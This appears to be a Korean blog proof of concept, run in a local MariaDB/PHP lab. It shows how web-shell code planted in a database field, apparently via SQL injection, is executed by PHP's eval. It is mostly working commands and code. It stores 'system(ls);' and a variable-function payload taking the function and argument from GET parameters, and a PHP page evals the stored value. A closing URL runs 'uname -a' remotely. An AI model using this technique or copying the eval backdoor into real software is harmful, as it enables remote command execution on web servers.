php가변함수 참고 : https://demonteam.org/2018/07/18/php/
db에 웹쉘코드를 박고 실행이 될까 하는 의문점에서 시작한 POC
sql인젝션으로 DB에 웹쉘코드를 박고 활용하는 방안이다.
|
root@tkpark-VirtualBox:/var/www/html# mysql -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 43
Server version: 10.1.34-MariaDB-0ubuntu0.18.04.1 Ubuntu 18.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> create user 'iesay'@'%' identified by '1234';
Query OK, 0 rows affected (0.00 sec)
MariaDB [(none)]> grant all on iesay.* to 'iesay'@'%';
Query OK, 0 rows affected (0.00 sec)
MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec) |
|
MariaDB [(none)]> use iesay
Database changed
MariaDB [iesay]> create table users (
-> idx int not null auto_increment primary key,
-> id char(20),
-> name varchar(100),
-> pw char(20)
-> );
Query OK, 0 rows affected (0.02 sec)
MariaDB [iesay]> show tables;
+-----------------+
| Tables_in_iesay |
+-----------------+
| users |
+-----------------+
|
|
MariaDB [iesay]> desc users;
+-------+----------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+-------+----------+------+-----+---------+----------------+
| idx | int(11) | NO | PRI | NULL | auto_increment |
| id | char(20) | YES | | NULL | |
| name | char(20) | YES | | NULL | |
| pw | char(20) | YES | | NULL | |
+-------+----------+------+-----+---------+----------------+
4 rows in set (0.00 sec)
MariaDB [iesay]> insert into users(id, name, pw) values('admin', '관리자', 'toor');
Query OK, 1 row affected (0.00 sec)
|
|
MariaDB [iesay]> select * from users;
+-----+---------+-----------+------+
| idx | id | name | pw |
+-----+---------+-----------+------+
| 1 | admin | 관리자 | toor |
|
+-----+---------+-----------+------+
1 rows in set (0.00 sec)
|
apt-get install php7.0-mysql
설치 후
phpinfo에서 PDO확인
|
MariaDB [iesay]> update users set name = "system(ls);" where id="admin";
Query OK, 1 row affected (0.00 sec)
Rows matched: 1 Changed: 1 Warnings: 0
MariaDB [iesay]> select * from users;
+-----+---------+-------------+------+
| idx | id | name | pw |
+-----+---------+-------------+------+
| 1 | admin | system(ls); | toor |
|
+-----+---------+-------------+------+
1 rows in set (0.00 sec)
|
1.php
|
session_start(); // 세션
include ("connect.php"); // DB접속
$query = "select * from users where id='admin' and pw='toor'";
$result = mysqli_query($con, $query);
$row = mysqli_fetch_array($result);
$a= $row['name'];
?>
|
2.php
|
<html>
<body>
<h1>Welcome to my home page!</h1>
<p>Some text.</p>
<p>Some more text.</p>
<?php include '1.php';
eval($a);
?>
</body>
</html>
|
eval함수를 이용한 웹쉘,,,
|
MariaDB [iesay]> update users set name = "$_GET['a']($_GET['b']);" where id="admin";
Query OK, 1 row affected (0.01 sec)
Rows matched: 1 Changed: 1 Warnings: 0
MariaDB [iesay]> select * from users;
+-----+---------+-------------------------+------+
| idx | id | name | pw |
+-----+---------+-------------------------+------+
| 1 | admin | $_GET['a']($_GET['b']); | toor |
|
+-----+---------+-------------------------+------+
1 rows in set (0.00 sec) |
http://192.168.0.118/2.php?a=system&b=uname%20-a
가변함수로도 사용 가능
